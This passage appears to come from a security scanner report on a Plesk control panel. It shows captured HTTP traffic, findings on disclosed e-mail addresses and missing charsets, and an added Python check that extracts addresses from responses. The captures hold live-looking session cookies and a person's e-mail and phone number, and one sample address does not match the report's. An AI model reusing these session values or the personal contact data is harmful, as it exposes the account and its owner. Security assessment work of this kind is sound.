head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/list" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Flist' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>User Accounts</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.bar.Tabs({
cls: 'tabs',
renderTo: 'main',
items: [{"componentType":"Jsw.bar.Button","title":"User Accounts","href":"\/user\/list","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"User Roles","href":"\/role\/list","containerCls":""}] });
});
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   new Jsw.Hint({
renderTo: 'main',
hint: 'If you want to allow other users to access the Panel for managing websites, installed applications, or use e-mail services under your domains, then you need to create user accounts.' });

new Jsw.Panel({
cls: 'list-box',
renderTo: 'main',
items: [
new Jsw.List({
id: 'users-list',
searchOveral: 'name',
data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":4,"totalItemCount":4,"firstItemNumber":1,"lastItemNumber":4},"state":{"sortField":"contactName","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":{"name":{"searchText":""},"email":{"searchText":""},"role":{"searchText":""}},"forceShowSearch":false},"data":[{"id":"3","isBuiltIn":"0","contactName":"format-1","email":"format-1@nosedivesailing.com","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":null,"isLocked":"0"},{"id":"4","isBuiltIn":"0","contactName":"format-1","email":"fdf080d9224fd0d18957a62c@vulnerable.host.fqdn","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":null,"isLocked":"0"},{"id":"5","isBuiltIn":"0","contactName":"format-1","email":"format-1fdf080d9644e588dffa16265@nosedivesailing.com","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":null,"isLocked":"0"},{"id":"2","isBuiltIn":"1","contactName":"Hoyt LLC Research","email":"h02332@gmail.com","roleId":"5","roleName":"Owner","roleIsBuiltIn":"1","phone":"+1 339 206 1886","isLocked":"0"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/user/list-data',
disabledSelectHint: 'This user account cannot be removed because it is either a built-in user account or your own user account.',
       searchFilters: {"name":{"type":"text","fields":["contactName"],"options":null,"title":"Contact name","overal":false},"email":{"type":"text","fields":["email"],"options":null,"title":"E-mail address","overal":false},"role":{"type":"text","fields":["roleId"],"options":[{"type":"value","label":"Any","value":""},{"type":"value","label":"Accountant","value":"8"},{"type":"value","label":"Application User","value":"7"},{"type":"value","label":"Owner","value":"5"},{"type":"value","label":"WebMaster","value":"6"}],"title":"User role","overal":false}},
columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'Contact name',
sortable: true,
dataIndex: 'contactName',
renderer: function(item, isDisabled) {
var link = '<a href="' + Jsw.baseUrl + '/user/edit/id/' + item.id + '">'
+ item.contactName.escapeHTML() + '</a>';

var status = (1 == item.isLocked)
? ( '<span class="hint-attention ">' +
'Inactive' +
'</span>')
: '';

return link + status;
}
}, {
header: 'E-mail address',
sortable: true,
cls: 'minor',
dataIndex: 'email',
renderer: function(item) {
return item.email
? '<a href="mailto:' + item.email + '">' + item.email + '</a>'
: '';
}
}, {
header: 'Role',
cls: 'minor',
sortable: true,
dataIndex: 'roleName'
}
],
operations: [{
componentType: 'Jsw.SmallButton',
title: 'Create User Account',
description: 'Create a new user account.',
addCls: 'sb-add-user',
href: '/user/create'
}, {
componentType: 'Jsw.bar.Separator'
}, {
componentType: 'Jsw.SmallButton',
id: 'buttonRemoveUser',
title: 'Remove',
description: 'Remove the selected user accounts.',
addCls: 'sb-remove-selected',
handler: function() {
Jsw.getComponent('users-list').execGroupOperation({
url: '/user/delete/?redirect=/user/list/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Remove the selected user accounts?' }
});
}
}
],
isDisabledItem: function(item) {
return ((1 == item.isBuiltIn) || (item.id == 2));
}
})
]
});
});
//]]>
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>
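Findings 11.11 to 11.13 are the scanner's e-mail-disclosure check against /smb/user/list: the panel embeds the full user list (contact name, e-mail, role, phone) as a JSON literal inside the Jsw.List script block on every page load, and the same data is served by the dataUrl /user/list-data. As an added example, not code from the report or from Plesk, the following Python reproduces that check. It splits a raw HTTP response into status line, headers and body, undoes the escapes a panel page uses (JSON \/ and \uXXXX inside script blocks, HTML character references such as &#64; in markup), extracts and de-duplicates addresses from the body only, and drops image-filename false positives such as logo@2x.png. SAMPLE_RESPONSE is a constructed cut-down page in the shape of the captured one; the addresses in it are the ones visible in the report's responses, while the \u0040, &#64; and logo@2x.png forms, the IGNORED_SUFFIXES list and the function names are assumptions introduced for the example.

```python
"""Reproduce an 'e-mail addresses disclosed in response' check.

Added example, not Plesk's or the scanner's own code. It mirrors the kind
of passive check behind findings 11.11-11.13 over a constructed response
that embeds Jsw.List user data the way the captured /smb/user/list page does.
"""
import html
import re
from typing import Dict, List, Tuple

# Deliberately narrower than RFC 5322: this is the addr-spec shape that
# turns up in HTML, JSON and JS, and it stops before quotes and brackets.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")
JSON_UNICODE_RE = re.compile(r"\\u([0-9a-fA-F]{4})")

# Assumed false-positive filter: asset names such as logo@2x.png satisfy
# the regex (local part 'logo', domain '2x.png') but are not addresses.
IGNORED_SUFFIXES = (".png", ".gif", ".jpg", ".js", ".css")


def split_response(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 response into (status line, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *header_lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def normalise(body: str) -> str:
    """Undo the encodings that can hide an address from a naive grep.

    JSON escapes inside <script> blocks are decoded first (\\uXXXX, \\/),
    then HTML character references such as &#64; in the markup itself.
    """
    body = JSON_UNICODE_RE.sub(lambda m: chr(int(m.group(1), 16)), body)
    body = body.replace("\\/", "/")
    return html.unescape(body)


def extract_disclosed_emails(raw_response: str) -> List[str]:
    """Return the unique, lower-cased addresses present in the response body.

    Header values are deliberately excluded: only what the browser renders,
    or what script running in the panel origin can read, is reported.
    """
    _, _, body = split_response(raw_response)
    found = set()
    for addr in EMAIL_RE.findall(normalise(body)):
        if addr.lower().endswith(IGNORED_SUFFIXES):
            continue
        found.add(addr.lower())
    return sorted(found)


# Constructed sample in the shape of the captured /smb/user/list page. The
# addresses are those visible in the report; the \u0040 and &#64; copies of
# h02332@gmail.com and the logo@2x.png asset are added to exercise the
# normalisation, de-duplication and false-positive filtering.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "\r\n"
    "<html><body><script>\n"
    "new Jsw.List({ data: {\"data\":["
    "{\"contactName\":\"format-1\",\"email\":\"format-1@nosedivesailing.com\"},"
    "{\"contactName\":\"format-1\",\"email\":\"fdf080d9155e57dfcfa94264@vulnerable.host.fqdn\"},"
    "{\"contactName\":\"Hoyt LLC Research\",\"email\":\"h02332\\u0040gmail.com\"}"
    "]}, dataUrl: '\\/user\\/list-data' });\n"
    "</script>\n"
    "<a href=\"mailto:h02332&#64;gmail.com\">h02332&#64;gmail.com</a>\n"
    "<img src=\"/skins/default/img/logo@2x.png\" />\n"
    "</body></html>\n"
)


if __name__ == "__main__":
    for address in extract_disclosed_emails(SAMPLE_RESPONSE):
        print(address)
```

Run it and it prints the three distinct addresses from the sample, one per line. The point of normalising before matching is that the captured page carries the user list twice over, as a JSON literal in the script block and as rendered mailto: links, and a check that only greps the raw markup will under-count when either copy is escaped. The check stays at Information severity because the data is visible to an authenticated panel user by design; its value in a report like this one is to show exactly which contact details a least-privileged session can read.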

11.13. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/list/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/list/

Issue detail

The following email addresses were disclosed in the response:

format-1@nosedivesailing.com
fdf080d9224fd0d18957a62c@vulnerable.host.fqdn
format-1fdf080d9644e588dffa16265@nosedivesailing.com
h02332@gmail.com

Request

GET /smb/user/list/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:13:12 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:13:11 GMT
Connection: close
Content-Length: 14319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>User Accounts - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/list" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Flist%2F' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>User Accounts</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.bar.Tabs({
cls: 'tabs',
renderTo: 'main',
items: [{"componentType":"Jsw.bar.Button","title":"User Accounts","href":"\/user\/list","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"User Roles","href":"\/role\/list","containerCls":""}] });
});
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   new Jsw.Hint({
renderTo: 'main',
hint: 'If you want to allow other users to access the Panel for managing websites, installed applications, or use e-mail services under your domains, then you need to create user accounts.' });

new Jsw.Panel({
cls: 'list-box',
renderTo: 'main',
items: [
new Jsw.List({
id: 'users-list',
searchOveral: 'name',
data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":4,"totalItemCount":4,"firstItemNumber":1,"lastItemNumber":4},"state":{"sortField":"contactName","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":{"name":{"searchText":""},"email":{"searchText":""},"role":{"searchText":""}},"forceShowSearch":false},"data":[{"id":"3","isBuiltIn":"0","contactName":"format-1","email":"format-1@nosedivesailing.com","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":null,"isLocked":"0"},{"id":"4","isBuiltIn":"0","contactName":"format-1","email":"fdf080d9224fd0d18957a62c@vulnerable.host.fqdn","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":"1","isLocked":"0"},{"id":"5","isBuiltIn":"0","contactName":"format-1","email":"format-1fdf080d9644e588dffa16265@nosedivesailing.com","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":null,"isLocked":"0"},{"id":"2","isBuiltIn":"1","contactName":"Hoyt LLC Research","email":"h02332@gmail.com","roleId":"5","roleName":"Owner","roleIsBuiltIn":"1","phone":"+1 339 206 1886","isLocked":"0"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/user/list-data',
disabledSelectHint: 'This user account cannot be removed because it is either a built-in user account or your own user account.',
       searchFilters: {"name":{"type":"text","fields":["contactName"],"options":null,"title":"Contact name","overal":false},"email":{"type":"text","fields":["email"],"options":null,"title":"E-mail address","overal":false},"role":{"type":"text","fields":["roleId"],"options":[{"type":"value","label":"Any","value":""},{"type":"value","label":"Accountant","value":"8"},{"type":"value","label":"Application User","value":"7"},{"type":"value","label":"Owner","value":"5"},{"type":"value","label":"WebMaster","value":"6"}],"title":"User role","overal":false}},
columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'Contact name',
sortable: true,
dataIndex: 'contactName',
renderer: function(item, isDisabled) {
var link = '<a href="' + Jsw.baseUrl + '/user/edit/id/' + item.id + '">'
+ item.contactName.escapeHTML() + '</a>';

var status = (1 == item.isLocked)
? ( '<span class="hint-attention ">' +
'Inactive' +
'</span>')
: '';

return link + status;
}
}, {
header: 'E-mail address',
sortable: true,
cls: 'minor',
dataIndex: 'email',
renderer: function(item) {
return item.email
? '<a href="mailto:' + item.email + '">' + item.email + '</a>'
: '';
}
}, {
header: 'Role',
cls: 'minor',
sortable: true,
dataIndex: 'roleName'
}
],
operations: [{
componentType: 'Jsw.SmallButton',
title: 'Create User Account',
description: 'Create a new user account.',
addCls: 'sb-add-user',
href: '/user/create'
}, {
componentType: 'Jsw.bar.Separator'
}, {
componentType: 'Jsw.SmallButton',
id: 'buttonRemoveUser',
title: 'Remove',
description: 'Remove the selected user accounts.',
addCls: 'sb-remove-selected',
handler: function() {
Jsw.getComponent('users-list').execGroupOperation({
url: '/user/delete/?redirect=/user/list/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Remove the selected user accounts?' }
});
}
}
],
isDisabledItem: function(item) {
return ((1 == item.isBuiltIn) || (item.id == 2));
}
})
]
});
});
//]]>
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

12. HTML does not specify charset
There are 16 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


12.1. http://vulnerable.plesk.control.panel.20110407.20:8880/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /

Request

GET / HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:21:35 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=dba661f53b2a81d0d08fcba319a6f6fa; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:21:35 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.2. http://vulnerable.plesk.control.panel.20110407.20:8880/javascript/chk.js.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /javascript/chk.js.php

Request

GET /javascript/chk.js.php?1302230642 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&file=/httpdocs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "1306174954-17161f28b87a6960fb097d11330c9c53-en-US"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:34 GMT
Connection: close
Content-Length: 8894

function chk_quotes(str)
{
   re = /(\'.*\")|(\".*\')/;
   return str.search(re) == -1;
}


function chk_pd_name(dir)
{
   re = /^[0-9a-zA-Z\-_.\/~@!\+=\^\(\)\[\]\{\}, ]+$/;
   // forbid // and ^. and /. and .$ and ./
   re1 = /(\/\/|^\.|\.$|\/\.|\.\/|\/ | \/)/;
   return (dir.search(re) != -1) && (dir.search(re1) == -1);
}

function chk_db_name(db)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9-_]{0,63}$/;
   return db.search(re) != -1;
}

function chk_db_usr_name(usr, type)
{
   if (type == 'mssql')
       re = /^[a-zA-Z]{1}[A-Za-z0-9_\-]{0,127}$/;
   else
       re = /^[a-zA-Z]{1}[A-Za-z0-9_\-]{0,15}$/;
   return usr.search(re) != -1;
}

function chk_pos_int(pos_int)
{
   re = /^\s*[1-9]{1}[0-9]*\s*$/;
   return pos_int.search(re) != -1;
}

function chk_sys_login(nm)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9_.-]{0,14}$/;
   return nm.search(re) != -1;
}

function chk_mn(mail_name)
{
   re = /^([A-Za-z0-9_\-])+((\.){1}([A-Za-z0-9_\-])+)*$/;
   return mail_name.search(re) != -1;
}

function chk_resp_name(resp_name)
{
   return ((resp_name.length > 0) && (resp_name.length <= 245));
}

function chk_login(login)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9_.-]{0,254}$/;
   return login.search(re) != -1;
}

function chk_realm(realm)
{
   re = /^[^\"]*$/;
   return realm.search(re) != -1;
}

function chk_dom(dom_name)
{
   if ('' == dom_name)
       return false; // check empty value

   if ('localhost.rev' == dom_name)
       return false;

   inaddr = /\.in-addr.arpa$/;
   if (dom_name.search(inaddr) != -1)
       return false;

   if (chk_ip(dom_name))    // no domain name like IP address
       return false;

   dotd = /\.d$/;
   if (dom_name.search(dotd) != -1)
       return false;

   return true; // IDN support
   /*
   nore = /\.$/;
   re = /^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9]){0,1}(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9]){0,1}){1,}$/;

   return (dom_name.search(nore) == -1) && dom_name.match(re);
   */
}

function chk_subdom(dom_name)
{
   return true; // IDN support
   /*
   re = /^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*$/;
   return dom_name.search(re) != -1;
   */
}

function chk_email(email)
{
   re = /^([^\@]+){1}\@([^\@]+){1}$/;
   found = email.match(re);
   if (!found)
       return false;
   return chk_mn(found[1]) && chk_dom(found[2]);
}

function chk_url(url)
{
   re = /^((http[s]?|ftp):\/\/)?([^\/:]+)(:\d{1,5})?(\/[^\s\"\'`]*)?$/i;
   found = re.exec(url);
   if (!found)
       return false;

   return chk_dom(found[3]);
}

function chk_ip(ip)
{
   return chk_ip_address_and_mask(ip, 4, 8);
}

function chk_dom_t(hst)
{
re = /^((<domain>|[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*)(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*|\.<domain>)+|<domain>)$/;
return hst.match(re);
}

function chk_ip_t(ip)
{
   re = /^<ip>$/;
   return chk_ip(ip) || ip.match(re);
}

function chk_mask(mask)
{
   re = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;
   found = mask.match(re);
